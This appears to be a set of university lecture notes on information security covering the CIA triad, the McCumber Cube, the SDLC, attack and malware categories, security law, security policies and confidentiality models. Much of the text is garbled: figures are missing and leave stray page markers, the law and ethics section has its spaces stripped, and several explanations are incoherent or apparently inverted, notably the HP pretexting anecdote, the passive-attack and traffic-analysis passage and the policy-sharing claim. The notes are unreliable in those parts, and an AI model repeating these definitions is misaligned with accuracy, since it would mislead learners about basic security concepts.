DIS (CW3551) Notes
DIS (CW3551) Notes
UNIT I INTRODUCTION
Introduction
James Anderson, executive consultant at Emagined Security, Inc., believes information
security in an enterprise is a “well-informed sense of assurance that the information risks
and controls are in balance.” He is not alone in his perspective.
Many information security practitioners recognize that aligning information security
needs with business objectives must be the top priority
1
UNIT I
2
UNIT I
3
UNIT I
4
UNIT I
When used in a phishing attack, e-mail spoofing lures victims to a Web server that does
not represent the organization it purports to, in an attempt to steal their private data such
as account numbers and passwords.
The most common variants include posing as a bank or brokerage company, e-commerce
organization, or Internet service provider. Even when authorized, pretexting does not
always lead to a satisfactory outcome.
In 2006, the CEO of Hewlett-Packard, a corporate director suspected of leaking
confidential information. The resulting firestorm of negative publicity led to Ms. Dunn’s
eventual departure from the company.13
3. Confidentiality Information has confidentiality when it is protected from disclosure or
exposure to unauthorized individuals or systems. Confidentiality ensures that only those
with the rights and privileges to access information are able to do so.
When unauthorized individuals or systems can view information, confidentiality is
breached.
To protect the confidentiality of information, you can use a number of measures,
including the following:
Information classification
Secure document
storage Application of general security policies
Education of information custodians and
end users Confidentiality
Individuals who transact with an organization expect that their personal information will
remain confidential, whether the organization is a federal agency, such as the Internal
Revenue Service, or a business.
Problems arise when companies disclose confidential information. Sometimes this
disclosure is intentional, but there are times when disclosure of confidential information
happens by mistake—for example, when confidential information is mistakenly e-mailed
to someone outside the organization rather than to someone inside the organization.
Several cases of privacy violation are outlined in Offline: Unintentional Disclosures.
Other examples of confidentiality breaches are an employee throwing away a document
containing critical information without shredding it, or a hacker who successfully breaks
into an internal database of a Web-based organization and steals sensitive information
about the clients, such as names, addresses, and credit card numbers.
5
UNIT I
6
UNIT I
4. Utility The utility of information is the quality or state of having value for some purpose
or end. Information has value when it can serve a purpose. If information is available, but
is not in a format meaningful to the end user, it is not useful.
5. Possession The possession of information is the quality or state of ownership or control.
Information is said to be in one’s possession if one obtains it, independent of format or
other characteristics. While a breach of confidentiality always results in a breach of
possession, a breach of possession does not always result in a breach of confidentiality.
NSTISSC SECURITY MODEL
The definition of information security presented is based in part on the CNSS document
called the National Training Standard for Information Systems Security
Professionals NSTISSI No. 4011.
This document presents a comprehensive information security model and has become a
widely accepted evaluation standard for the security of information systems. The model,
created by John McCumber in 1991, provides a graphical representation of the
architectural approach widely used in computer and information security; it is now known
as the McCumber Cube.17
The McCumber Cube in Figure 1-6, shows three dimensions. If extrapolated, the three
dimensions of each axis become a 3 3 3 cube with 27 cells representing areas that must be
addressed to secure today’s information systems.
To ensure system security, each of the 27 areas must be properly addressed during the
security process. For example, the intersection between technology, integrity, and storage
requires a control or safeguard that addresses the need to use technology to protect the
integrity of information while in storage.
7
UNIT I
What is commonly left out of such a model is the need for guidelines and policies that
provide direction for the practices and implementations of technologies.
COMPONENTS OF AN INFORMATION SYSTEM
As shown in Figure 1-7, an information system (IS) is much more than computer hardware;
it is the entire set of software, hardware, data, people, procedures, and networks that make
possible the use of information resources in the organization. These six critical components
enable information to be input, processed, output, and stored. Each of these IS
components has its own strengths and weaknesses, as well as its own characteristics and uses.
Each component of the information system also has its own security requirements.
Software
The software component of the IS comprises applications, operating systems, and
assorted command utilities. Software is perhaps the most difficult IS component to
secure.
The exploitation of errors in software programming accounts for a substantial portion of
the attacks on information. In fact, many facets of daily life are affected by buggy
software, from smartphones that crash to flawed automotive control computers that lead
to recalls.
Software carries the lifeblood of information through an organization. Unfortunately,
software programs are often created under the constraints of project management, which
limit time, cost, and manpower.
8
UNIT I
Hardware
Hardware is the physical technology that houses and executes the software, stores and
transports the data, and provides interfaces for the entry and removal of information from
the system.
Physical security policies deal with hardware as a physical asset and with the protection
of physical assets from harm or theft. Applying the traditional tools of physical security,
such as locks and keys, restricts access to and interaction with the hardware components
of an information system.
Securing the physical location of computers and the computers themselves is important
because a breach of physical security can result in a loss of information. Unfortunately,
most information systems are built on hardware platforms that cannot guarantee any level
of information security if unrestricted access to the hardware is possible.
Before September 11, 2001, laptop thefts in airports were common. A two-person team
worked to steal a computer as its owner passed it through the conveyor scanning devices.
The first perpetrator entered the security area ahead of an unsuspecting target and quickly
went through. Then, the second perpetrator waited behind the target until the target placed
his/her computer on the baggage scanner. As the computer was whisked through, the
second agent slipped ahead of the victim and entered the metal detector with a substantial
collection of keys, coins, and the like, thereby slowing the detection process and allowing
the first perpetrator to grab the computer and disappear in a crowded walkway. While the
security response to September 11, 2001 did tighten the security process at airports,
hardware can still be stolen in airports and other public places.
Although laptops and notebook computers are worth a few thousand dollars, the
information contained in them can be worth a great deal more to organizations and
individuals.
Data
Data stored, processed, and transmitted by a computer system must be protected. Data is
often the most valuable asset possessed by an organization and it is the main target of
intentional attacks. Systems developed in recent years are likely to make use of database
Introduction to Information Security 17management systems. When done properly, this
should improve the security of the data and the application.
Unfortunately, many system development projects do not make full use of the database
management system’s security capabilities, and in some cases the database is
implemented in ways that are less secure than traditional file systems.
9
UNIT I
People
Though often overlooked in computer security considerations, people have always been a
threat to information security.
Around 1275 A.D., Kublai Khan finally achieved what the Huns had been trying for
thousands of years. Initially, the Khan’s army tried to climb over, dig under, and break
through the wall. In the end, the Khan simply bribed the gatekeeper—and the rest is
history. Whether this event actually occurred or not, the moral of the story is that people
can be the weakest link in an organization’s information security program.
And unless policy, education and training, awareness, and technology are properly
employed to prevent people from accidentally or intentionally damaging or losing
information, they will remain the weakest link.
Procedures
Another frequently overlooked component of an IS is procedures. Procedures are written
instructions for accomplishing a specific task. When an unauthorized user obtains an
organization’s procedures, this poses a threat to the integrity of the information.
For example, a consultant to a bank learned how to wire funds by using the computer
center’s procedures, which were readily available. By taking advantage of a security
weakness (lack of authentication), this bank consultant ordered millions of dollars to be
transferred by wire to his own account.
Most organizations distribute procedures to their legitimate employees so they can access
the information system, but many of these companies often fail to provide proper
education on the protection of the procedures.
Educating employees about safeguarding procedures is as important as physically
securing the information system. After all, procedures are information in their own right.
Therefore, knowledge of procedures, as with all critical information, should be
disseminated among members of the organization only on a need-to-know basis.
Networks
The IS component that created much of the need for increased computer and information
security is networking.
When information systems are connected to each other to form local area networks
(LANs), and these LANs are connected to other networks such as the Internet, new
security challenges rapidly emerge.
The physical technology that enables network functions is becoming more and more
accessible to organizations of every size. Applying the traditional tools of physical
10
UNIT I
security, such as locks and keys, to restrict access to and interaction with the hardware
components of an information system are still important; but when computer systems are
networked, this approach is no longer enough.
Balancing Information Security and Access
Even with the best planning and implementation, it is impossible to obtain perfect
information security. Information security cannot be absolute: it is a process, not a goal. It
is possible to make a system available to anyone, anywhere, anytime, through any means.
However, such unrestricted access poses a danger to the security of the information. On
the other hand, a completely secure information system would not allow anyone access.
For instance, when challenged to achieve a TCSEC C-2 level security certification for its
Windows operating system, Microsoft had to remove all networking components and
operate the computer from only the console in a secured room.
To achieve balance—that is, to operate an information system that satisfies the user and
the security professional—the security level must allow reasonable access, yet protect
against threats.
Figure 1-8 shows some of the competing voices that must be considered when balancing
information security and access. Because of today’s security concerns and issues, an
information system or data-processing department can get too entrenched in the
management and protection of systems.
An imbalance can occur when the needs of the end user are undermined by too heavy a
focus on protecting and administering the information systems. Both information security
technologists and end users must recognize that both groups share the same overall goals
of the organization—to ensure the data is available when, where, and how it is needed,
with minimal delays or obstacles. In an ideal world, this level of availability can be met
even after concerns about loss, damage, interception, or destruction have been addressed.
11
UNIT I
THE SDLC
The Systems Development Life Cycle
Information security must be managed in a manner similar to any other major system
implemented in an organization. One approach for implementing an information security
system in an organization with little or no formal security in place is to use a variation of
the systems development life cycle (SDLC): the security systems development life cycle
(SecSDLC). To understand a security systems development life cycle, you must first
understand the basics of the method upon which it is based.
12
UNIT I
structured review or reality check, during which the team determines if the project should
be continued, discontinued, outsourced, postponed, or returned to an earlier phase
depending on whether the project is proceeding as expected and on the need for additional
expertise, organizational knowledge, or other resources.
Once the system is implemented, it is maintained (and modified) over the remainder of its
operational life. Any information systems implementation may have multiple iterations as
the cycle is repeated over time.
Only by means of constant examination and renewal can any system, especially an
information security program, perform up to expectations in the constantly changing
environment in which it is placed. The following sections describe each phase of the
traditional SDLC.20
Investigation
The first phase, investigation, is the most important. What problem is the system being
developed to solve? The investigation phase begins with an examination of the event or
plan that initiates the process. During the investigation phase, the objectives, constraints,
and scope of the project are specified.
A preliminary cost-benefit analysis evaluates the perceived benefits and the appropriate
levels of cost for those benefits. At the conclusion of this phase, and at every phase
following, a feasibility analysis assesses the economic, technical, and behavioral
feasibilities of the process and ensures that implementation is worth the organization’s
time and effort.
Analysis
The analysis phase begins with the information gained during the investigation phase.
This phase consists primarily of assessments of the organization, its current systems, and
its capability to support the proposed systems. Analysts begin by determining what the
new system is expected to do and how it will interact with existing systems. This phase
ends with the documentation of the findings and an update of the feasibility analysis.
Logical Design
In the logical design phase, the information gained from the analysis phase is used to
begin creating a systems solution for a business problem. In any systems solution, it is
imperative that the first and driving factor is the business need.
Based on the business need, applications are selected to provide needed services, and then
data support and structures capable of providing the needed inputs are chosen. Finally,
based on all of the above, specific technologies to implement the physical solution are
13
UNIT I
delineated. The logical design is, therefore, the blueprint for the desired solution. The
logical design is implementation independent, meaning that it contains no reference to
specific technologies, vendors, or products.
It addresses, instead, how the proposed system will solve the problem at hand. In this
stage, analysts generate a number of alternative solutions, each with corresponding
strengths and weaknesses, and costs and benefits, allowing for a general comparison of
available options. At the end of this phase, another feasibility analysis is performed.
Physical Design
During the physical design phase, specific technologies are selected to support the
alternatives identified and evaluated in the logical design. The selected components are
evaluated based on a make-or-buy decision (develop the components in-house or
purchase them from a vendor).
Final designs integrate various components and technologies. After yet another feasibility
analysis, the entire solution is presented to the organizational management for approval.
Implementation
In the implementation phase, any needed software is created. Components are ordered,
received, and tested. Afterward, users are trained and supporting documentation created.
Once all components are tested individually, they are installed and tested as a system.
Again a feasibility analysis is prepared, and the sponsors are then presented with the
system for a performance review and acceptance test.
Maintenance and Change
The maintenance and change phase is the longest and most expensive phase of the
process. This phase consists of the tasks necessary to support and modify the system for
the remainder of its useful life cycle. Even though formal development may conclude
during this phase, the life cycle of the project continues until it is determined that the
process should begin again from the investigation phase.
At periodic points, the system is tested for compliance, and the feasibility of continuance
versus discontinuance is evaluated. Upgrades, updates, and patches are managed. As the
needs of the organization change, the systems that support the organization must also
change.
It is imperative that those who manage the systems, as well as those who support them,
continually monitor the effectiveness of the systems in relation to the organization’s
environment. When a current system can no longer support the evolving mission of the
organization, the project is terminated and a new project is implemented.
14
UNIT I
Investigation/Analysis Phases
Security categorization—defines three levels (i.e., low, moderate, or high) of potential
impact on organizations or individuals should there be a breach of security (a loss of
confidentiality, integrity, or availability). Security categorization standards assist
organizations in making the appropriate selection of security controls for their
information systems.
Preliminary risk assessment—results in an initial description of the basic security needs
of the system. A preliminary risk assessment should define the threat environment in
which the system will operate.
15
UNIT I
16
UNIT I
management and operational controls. Other planning components — ensure that all
necessary components of the development process are considered when incorporating
security into the life cycle. These components include selection of the appropriate
contract type, participation by all necessary functional groups within an organization,
participation by the certifier and accreditor, and development and execution of necessary
contracting plans and processes.
Implementation Phase
Inspection and acceptance—ensures that the organization validates and verifies that the
functionality described in the specification is included in the deliverables. System
integration—ensures that the system is integrated at the operational site where the
information system is to be deployed for operation.
Security control settings and switches are enabled in accordance with vendor instructions
and available security implementation guidance. Security certification—ensures that the
controls are effectively implemented through established verification techniques and
procedures and gives organization officials confidence that the appropriate safeguards and
countermeasures are in place to protect the organization’s information system.
Security certification also uncovers and describes the known vulnerabilities in the
information system. Security accreditation—provides the necessary security authorization
of an information system to process, store, or transmit information that is required. This
authorization is granted by a senior organization official and is based on the verified
effectiveness of security controls to some agreed upon level of assurance and an
identified residual risk to agency assets or operations.
Maintenance and Change Phase
Configuration management and control—ensures adequate consideration of the potential
security impacts due to specific changes to an information system or its surrounding
environment. Configuration management and configuration control procedures are critical
to establishing an initial baseline of hardware, software, and firmware components for the
information system and subsequently controlling and maintaining an accurate inventory
of any changes to the system.
Continuous monitoring—ensures that controls continue to be effective in their application
through periodic testing and evaluation. Security control monitoring (i.e., verifying the
continued effectiveness of those controls over time) and reporting the security status of
the information system to appropriate agency officials is an essential activity of a
comprehensive information security program. Information preservation—ensures that
17
UNIT I
***************
18
UNIT II SECURITY INVESTIGATION
Need for Security, Business Needs, Threats, Attacks, Legal, Ethical and
Professional Issues - An Overview of Computer Security - Access Control
Matrix, Policy-Security policies, Confidentiality policies, Integrity policies
and Hybrid policies
Security Investigation:
Investigate suspicious email. Investigate suspicious logins, system behavior, and networking
traffic. Pull forensic system images for certain system breaches, legal issues, or to determine
risk/exposure when a system is compromised or stolen.
Business Needs:
Threat:
Information Security threats can be many like Software attacks, theft of intellectual
property, identity theft, theft of equipment or information, sabotage, and information
extortion.
Threat can be anything that can take advantage of a vulnerability to breach security and
negatively alter, erase, harm object or objects of interest.
Threats to Information Security:
1. Types of Cyber Attacks:
Cyber attacks are a major threat to information security and can take many forms,
including:
Malware: Malicious software designed to damage or disrupt computer systems. This
includes viruses, worms, and Trojans.
Phishing: Fraudulent emails or websites designed to trick users into disclosing sensitive
information such as passwords or credit card numbers.
Denial of Service (DoS) attacks: Attacks that aim to make a system or network
unavailable to its intended users by overwhelming it with traffic.
Ransomware: Malware that encrypts files on a computer system and demands a
ransom payment in exchange for the decryption key.
Social engineering: The use of psychological manipulation to trick individuals into
disclosing sensitive information or performing actions that compromise security.
2. Risks posed by Cyber Attacks:
Cyber attacks pose a significant risk to organizations and individuals. Some of the risks
posed by these attacks include:
Data Loss: Cyber attacks can result in the theft or destruction of sensitive information,
leading to data loss.
Reputation Damage: Cyber attacks can damage an organization’s reputation and
credibility, which can be difficult and expensive to repair.
Attacks:
Attacks are defined as passive and active. A passive attack is an attempt to understand or
create use of data from the system without influencing system resources; whereas an active
attack is an attempt to change system resources or influence their operation.
Passive Attacks − Passive attacks are in the feature of eavesdropping on, or observation of,
transmissions. The objective of the opponent is to access data that is being transmitted. There
are two method of passive attacks are release of message contents and traffic analysis.
The release of message contents is simply learn. A telephone chat, an electronic mail
message, and a transferred file can include sensitive or confidential data. It is like to avoid an
opponent from understanding the contents of these transmissions.
A second method of passive attack are traffic analysis. Assume that it is an approach of
hiding the contents of messages or some information traffic so that opponents, even if they
acquired the message, could not extract the data from the message.
The general approach for masking contents is encryption. If it can have an encryption
security in area, an opponent can be able to find the duplicate of these messages.
The opponent can decide the location and identity of broadcasting hosts and can detect the
frequency and magnitude of messages being exchanged. This data can be beneficial in
guessing the feature of the communication that was creating place.
Active Attacks − Active attacks contains some modification of the data flow or the creation
of a false flow and can be subdivided into four elements such as masquerade, replay,
modification of messages, and denial of service.
Replay − Replay contains the passive capture of an information unit and its consecutive
retransmission to create an unauthorized development.
Masquerade − A masquerade creates place when one entity impersonate to be a various
entity. A masquerade attack generally involves one of the multiple forms of active attack.
For instance, authentication array can be captured and replayed after a true authentication
array has taken place, therefore allowing an authorized entity with some privileges to acquire
more privileges by imitate an entity that has those privileges.
Modification of messages − Modification of message simply defines that some portion of a
legitimate message is transformed, or that messages are held up or reordered, to make an
unauthorized effect.
Denial of Service − The denial of service avoids or prevent the general use or administration
of communications facilities. This attack can have a definite focus. For instance, an entity
can suppress some messages supervised to a specific destination.
Software attacks means attack by Viruses, Worms, Trojan Horses etc. Many users believe
that malware, virus, worms, bots are all same things. But they are not same, only similarity
is that they all are malicious software that behaves differently.
Malware is a combination of 2 terms- Malicious and Software. So Malware basically
means malicious software that can be an intrusive program code or anything that is
designed to perform malicious operations on system. Malware can be divided in 2
categories:
1)Infection Methods
2)Malware Actions
Malware on the basis of Infection Method are following:
1. Virus – They have the ability to replicate themselves by hooking them to the program
on the host computer like songs, videos etc and then they travel all over the Internet.
The Creeper Virus was first detected on ARPANET. Examples include File Virus,
Macro Virus, Boot Sector Virus, Stealth Virus etc.
2. Worms – Worms are also self-replicating in nature but they don’t hook themselves to
the program on host computer. Biggest difference between virus and worms is that
worms are network-aware. They can easily travel from one computer to another if
network is available and on the target machine they will not do much harm, they will,
for example, consume hard disk space thus slowing down the computer.
3. Trojan – The Concept of Trojan is completely different from the viruses and worms.
The name Trojan is derived from the ‘Trojan Horse’ tale in Greek mythology, which
explains how the Greeks were able to enter the fortified city of Troy by hiding their
soldiers in a big wooden horse given to the Trojans as a gift. The Trojans were very
fond of horses and trusted the gift blindly. In the night, the soldiers emerged and
attacked the city from the inside.
Their purpose is to conceal themselves inside the software that seem legitimate and
when that software is executed they will do their task of either stealing information or
any other purpose for which they are designed.
They often provide backdoor gateway for malicious programs or malevolent users to
enter your system and steal your valuable data without your knowledge and permission.
Examples include FTP Trojans, Proxy Trojans, Remote Access Trojans etc.
4. Bots –: can be seen as advanced form of worms. They are automated processes that are
designed to interact over the internet without the need for human interaction. They can
be good or bad. Malicious bot can infect one host and after infecting will create
connection to the central server which will provide commands to all infected hosts
attached to that network called Botnet.
1. Adware – Adware is not exactly malicious but they do breach privacy of the users.
They display ads on a computer’s desktop or inside individual programs. They come
attached with free-to-use software, thus main source of revenue for such developers.
They monitor your interests and display relevant ads. An attacker can embed malicious
code inside the software and adware can monitor your system activities and can even
compromise your machine.
2. Spyware – It is a program or we can say software that monitors your activities on
computer and reveal collected information to an interested party. Spyware are generally
dropped by Trojans, viruses or worms. Once dropped they install themselves and sits
silently to avoid detection.
One of the most common example of spyware is KEYLOGGER. The basic job of
keylogger is to record user keystrokes with timestamp. Thus capturing interesting
information like username, passwords, credit card details etc.
3. Ransomware – It is type of malware that will either encrypt your files or will lock your
computer making it inaccessible either partially or wholly. Then a screen will be
displayed asking for money i.e. ransom in exchange.
4. Scareware – It masquerades as a tool to help fix your system but when the software is
executed it will infect your system or completely destroy it. The software will display a
message to frighten you and force to take some action like pay them to fix your system.
5. Rootkits – are designed to gain root access or we can say administrative privileges in
the user system. Once gained the root access, the exploiter can do anything from
stealing private files to private data.
6. Zombies – They work similar to Spyware. Infection mechanism is same but they don’t
spy and steal information rather they wait for the command from hackers.
LawandEthicsinInformationSecurity
o Civillaw
o Criminallaw
o Tortlaw
o Privatelaw
o Publiclaw
RelevantU.S.Laws–General
ComputerFraudandAbuseActof1986
NationalInformationInfrastructureProtectionActof1996
USAPatriotActof2001
TelecommunicationsDeregulationandCompetitionActof1996
CommunicationsDecencyAct(CDA)
ComputerSecurityActof1987
Privacy
Theissueofprivacyhasbecomeoneofthehottesttopicsininformatio
n
The ability to collect information on an individual,
combine facts from separate sources,and merge it with
other information has resulted in databases of
information that werepreviouslyimpossibleto set up
The aggregation of data from multiple sources permits
unethical organizations to builddatabasesoffacts
withfrighteningcapabilities
PrivacyofCustomerInformation
PrivacyofCustomerInformationSectionofCommonCarrierRegul
ations
FederalPrivacyActof1974
TheElectronicCommunicationsPrivacyActof1986
TheHealthInsurancePortability&AccountabilityActOf1
996(HIPAA)alsoknownastheKennedy-KassebaumAct
TheFinancialServicesModernizationActorGramm-Leach-
BlileyActof1999
KeyU.SLawsofInteresttoInformationSecurityProfessionals:
Exportand EspionageLaws
EconomicEspionageAct (EEA)of1996
SecurityandFreedomThrough
EncryptionActof1997(SAFE)
USCopyrightLaw
IntellectualpropertyisrecognizedasaprotectedassetintheUS
UScopyrightlawextendsthisrighttothepublishedword,includinge
lectronicformats
Fairuseofcopyrightedmaterialsincludes
theusetosupportnewsreporting,teaching,scholarship,andanumberofotherrelated
permissions
thepurposeoftheusehastobeforeducationalorlibrarypurposes,notforprofit,and
should not beexcessive
FreedomofInformationActof1966(FOIA)
- USGovernmentagenciesarerequiredtodiscloseanyrequestedinformation
onreceipt ofawritten request
State&LocalRegulations
InternationalLawsandLegalBodies
RecentlytheCouncilofEuropedraftedtheEuropeanCoun
cilCyber-CrimeConvention,designed
tocreateaninternationaltaskforcetooverseearangeofsecurityfunctionsassociated
withInternet activities,
tostandardizetechnologylawsacrossinternationalborder
TheDigitalMillenniumCopyrightAct(DMCA)istheUSversionofaninternatio
nalefforttoreducetheimpactofcopyright,trademark,andprivacyinfringement
TheEuropeanUnionDirective95/46/ECincreasesprotectionofindividualswith
regardtotheprocessingofpersonaldataandlimits thefreemovementofsuchdata
TheUnitedKingdomhasalreadyimplementedaversionofthisdirectivecalledthe
DatabaseRight
UnitedNationsCharter
TosomedegreetheUnitedNationsCharterprovidesprovisionsforinformation
securityduring Information Warfare
InformationWarfare(IW)involvestheuseofinformationtechnologytoconducto
ffensive operations as part of an organized and lawful military operation by
a sovereignstate
IW is a relatively new application of warfare, although the military has
been conductingelectronic warfare andcounter-warfare operationsfor
decades, jamming,intercepting,andspoofing enemycommunications
PolicyVersusLaw
Mostorganizationsdevelopandformalizeabodyofexpectationscalledpolicy
Policiesfunctioninanorganizationlikelaws
Forapolicytobecomeenforceable,itmustbe:
- Distributedtoallindividualswhoareexpectedto complywithit
- Readilyavailableforemployeereference
- Easilyunderstoodwithmulti-
languagetranslationsandtranslationsforvisuallyimpaired,orliterac
y-impaired employees
- Acknowledgedbytheemployee,usuallybymeansofasignedconsentform
Onlywhenallconditionsaremet,doestheorganizationhaveareasonableexpectat
ionofeffectivepolicy
Ethical Concepts in
InformationSecurityCultural
Differencesin EthicalConcepts
Differencesinculturescauseproblemsindeterminingwhatisethicalandwhatisn
otethical
Studiesofethicalsensitivitytocomputeruserevealdifferentnationalitieshavedif
ferentperspectives
Difficultiesarisewhenonenationality’sethicalbehaviourcontradictsthatofanothernatio
nal group
EthicsandEducation
DeterrencetoUnethicalandIllegalBehavior
Deterrence-preventinganillegalorunethicalactivity
Laws,policies,andtechnicalcontrolsareallexamplesofdeterrents
Lawsandpoliciesonlydeterifthreeconditionsarepresent:
- Fearofpenalty
- Probabilityofbeingcaught
- Probabilityofpenaltybeingadministered
An overview of computer security:
Confidentiality: This term covers two related concepts:
Data confidentiality: Assures that private or confidential information is not made available
or disclosed to unauthorized individuals.
Privacy: Assures that individuals control or influence what information related to them may
be collected and stored and by whom and to whom that information may be disclosed.
■Integrity: This term covers two related concepts: Data integrity: Assures that information
(both stored and in transmitted packets) and programs are changed only in a specified and
authorized manner. System integrity: Assures that a system performs its intended function in
an unimpaired manner, free from deliberate or inadvertent unauthorized manipulation of the
system.
■Availability: Assures that systems work promptly and service is not denied to authorized
users. These three concepts form what is often referred to as the CIA triad. The three
concepts embody the fundamental security objectives for both data and for information and
computing services. For example, the NIST standard FIPS 199 (Standards for Security
Categorization of Federal Information and Information Systems) lists confidentiality,
integrity, and availability as the three security objectives for information and for information
systems. FIPS 199 provides a useful characterization of these three objectives in terms of
requirements and the definition of a loss of security in each category:
■Confidentiality: Preserving authorized restrictions on information access and disclosure,
including means for protecting personal privacy and proprietary information. A loss of
confidentiality is the unauthorized disclosure of information.
■ Integrity: Guarding against improper information modification or destruction, including
ensuring information nonrepudiation and authenticity. A loss of integrity is the unauthorized
modification or destruction of information.
■Availability: Ensuring timely and reliable access to and use of information. A loss of
availability is the disruption of access to or use of information or an information system.
■Authenticity: The property of being genuine and being able to be verified and trusted;
confidence in the validity of a transmission, a message, or message originator. This means
verifying that users are who they say they are and that each input arriving at the system came
from a trusted source.
■Accountability: The security goal that generates the requirement for actions of an entity to
be traced uniquely to that entity. This supports nonrepudiation, deterrence, fault isolation,
intrusion detection and prevention, and afteraction recovery and legal action. Because truly
secure systems are not yet an achievable goal, we must be able to trace a security breach to a
responsible party. Systems must keep records of their activities to permit later forensic
analysis to trace security breaches or to aid in transaction disputes.
Policy-Security Policies:
1) It increases efficiency.
The best thing about having a policy is being able to increase the level of consistency which
saves time, money and resources. The policy should inform the employees about their
individual duties, and telling them what they can do and what they cannot do with the
organization sensitive information.
When any human mistake will occur, and system security is compromised, then the security
policy of the organization will back up any disciplinary action and also supporting a case in a
court of law. The organization policies act as a contract which proves that an organization has
taken steps to protect its intellectual property, as well as its customers and clients.
3) It can make or break a business deal
It is not necessary for companies to provide a copy of their information security policy to
other vendors during a business deal that involves the transference of their sensitive
information. It is true in a case of bigger businesses which ensures their own security interests
are protected when dealing with smaller businesses which have less high-end security
systems in place.
A well-written security policy can also be seen as an educational document which informs the
readers about their importance of responsibility in protecting the organization sensitive data.
It involves on choosing the right passwords, to providing guidelines for file transfers and data
storage which increases employee's overall awareness of security and how it can be
strengthened.
We use security policies to manage our network security. Most types of security policies are
automatically created during the installation. We can also customize policies to suit our
specific environment. There are some important cybersecurity policies recommendations
describe below-
o It helps to detect, removes, and repairs the side effects of viruses and security risks by
using signatures.
o It helps to detect the threats in the files which the users try to download by using
reputation data from Download Insight.
o It helps to detect the applications that exhibit suspicious behaviour by using SONAR
heuristics and reputation data.
2. Firewall Policy
o It blocks the unauthorized users from accessing the systems and networks that connect
to the Internet.
o It detects the attacks by cybercriminals.
o It removes the unwanted sources of network traffic.
This policy automatically detects and blocks the network attacks and browser attacks. It also
protects applications from vulnerabilities. It checks the contents of one or more data packages
and detects malware which is coming through legal ways.
4. LiveUpdate policy
This policy can be categorized into two types one is LiveUpdate Content policy, and another
is LiveUpdate Setting Policy. The LiveUpdate policy contains the setting which determines
when and how client computers download the content updates from LiveUpdate. We can
define the computer that clients contact to check for updates and schedule when and how
often clients computer check for updates.
This policy protects a system's resources from applications and manages the peripheral
devices that can attach to a system. The device control policy applies to both Windows and
Mac computers whereas application control policy can be applied only to Windows clients.
6. Exceptions policy
This policy provides the ability to exclude applications and processes from detection by the
virus and spyware scans.
This policy provides the ability to define, enforce, and restore the security of client computers
to keep enterprise networks and data secure. We use this policy to ensure that the client's
computers who access our network are protected and compliant with companies? securities
policies. This policy requires that the client system must have installed antivirus.
A security policy doesn’t provide specific low-level technical guidance, but it does spell out
the intentions and expectations of senior management in regard to security. It’s then up to the
security or IT teams to translate these intentions into specific technical actions.
For example, a policy might state that only authorized users should be granted access to
proprietary company information. The specific authentication systems and access control
rules used to implement this policy can change over time, but the general intent remains the
same. Without a place to start from, the security or IT teams can only guess senior
management’s desires. This can lead to inconsistent application of security controls across
different groups and business entities.
Without a security policy, each employee or user will be left to his or her own judgment in
deciding what’s appropriate and what’s not. This can lead to disaster when different
employees apply different standards.
Is it appropriate to use a company device for personal use? Can a manager share passwords
with their direct reports for the sake of convenience? What about installing unapproved
software? Without clear policies, different employees might answer these questions in
different ways. A security policy should also clearly spell out how compliance is monitored
and enforced.
A good security policy can enhance an organization’s efficiency. Its policies get everyone on
the same page, avoid duplication of effort, and provide consistency in monitoring and
enforcing compliance. Security policies should also provide clear guidance for when policy
exceptions are granted, and by whom.
To achieve these benefits, in addition to being implemented and followed, the policy will also
need to be aligned with the business goals and culture of the organization.
Confidentiality policies:
Confidentiality is the protection of information in the system so that an unauthorized
person cannot access it. This type of protection is most important in military and
government organizations that need to keep plans and capabilities secret from enemies.
However, it can also be useful to businesses that need to protect their proprietary trade
secrets from competitors or prevent unauthorized persons from accessing the company’s
sensitive information (e.g., legal, personal, or medical information). Privacy issues have
gained an increasing amount of attention in the past few years, placing the importance of
confidentiality on protecting personal information maintained in automated systems by both
government agencies and private-sector organizations. Confidentiality must be well-
defined, and procedures for maintaining confidentiality must be carefully implemented. A
crucial aspect of confidentiality is user identification and authentication. Positive
identification of each system user is essential in order to ensure the effectiveness of policies
that specify who is allowed access to which data items.
Threats to Confidentiality: Confidentiality can be compromised in several ways. The
following are some of the commonly encountered threats to information confidentiality –
Hackers
Masqueraders
Unauthorized user activity
Unprotected downloaded files
Local area networks (LANs)
Trojan Horses
Confidentiality Models: Confidentiality models are used to describe what actions must be
taken to ensure the confidentiality of information. These models can specify how security
tools are used to achieve the desired level of confidentiality. The most commonly used
model for describing the enforcement of confidentiality is the Bell-LaPadula model.
In this model the relationship between objects (i.e, the files, records, programs and
equipment that contain or receive information) and subjects (i.e, the person, processes,
or devices that cause the information to flow between the objects).
The relationships are described in terms of the subject’s assigned level of access or
privilege and the object’s level of sensitivity. In military terms, these would be
described as the security clearance of the subject and the security classification of the
object.
Another type of model that is commonly used is Access control model.
It organizes the system into objects (i.e, resources being acted on), subjects (i.e, the
person or program doing the action), and operations (i.e, the process of interaction).
A set of rules specifies which operation can be performed on an object by which subject.
Types of Confidentiality :
In Information Security, there are several types of confidentiality:
1. Data confidentiality: refers to the protection of data stored in computer systems and
networks from unauthorized access, use, disclosure, or modification. This is achieved
through various methods, such as encryption and access controls.
2. Network confidentiality: refers to the protection of information transmitted over
computer networks from unauthorized access, interception, or tampering. This is
achieved through encryption and secure protocols such as SSL/TLS.
3. End-to-end confidentiality: refers to the protection of information transmitted between
two endpoints, such as between a client and a server, from unauthorized access or
tampering. This is achieved through encryption and secure protocols.
4. Application confidentiality: refers to the protection of sensitive information processed
and stored by software applications from unauthorized access, use, or modification. This
is achieved through user authentication, access controls, and encryption of data stored in
the application.
5. Disk and file confidentiality: refers to the protection of data stored on physical storage
devices, such as hard drives, from unauthorized access or theft. This is achieved through
encryption, secure storage facilities, and access controls.
Overall, the goal of confidentiality in Information Security is to protect sensitive and
private information from unauthorized access, use, or modification and to ensure that only
authorized individuals have access to confidential information.
Uses of Confidentiality :
In the field of information security, confidentiality is used to protect sensitive data and
information from unauthorized access and disclosure. Some common uses include:
1. Encryption: Encrypting sensitive data helps to protect it from unauthorized access and
disclosure.
2. Access control: Confidentiality can be maintained by controlling who has access to
sensitive information and limiting access to only those who need it.
3. Data masking: Data masking is a technique used to obscure sensitive information, such
as credit card numbers or social security numbers, to prevent unauthorized access.
4. Virtual private networks (VPNs): VPNs allow users to securely connect to a network
over the internet and protect the confidentiality of their data in transit.
5. Secure file transfer protocols (SFTPs): SFTPs are used to transfer sensitive data
securely over the internet, protecting its confidentiality in transit.
6. Two-factor authentication: Two-factor authentication helps to ensure that only
authorized users have access to sensitive information by requiring a second form of
authentication, such as a fingerprint or a one-time code.
7. Data loss prevention (DLP): DLP is a security measure used to prevent sensitive data
from being leaked or lost. It monitors and controls the flow of sensitive data, protecting
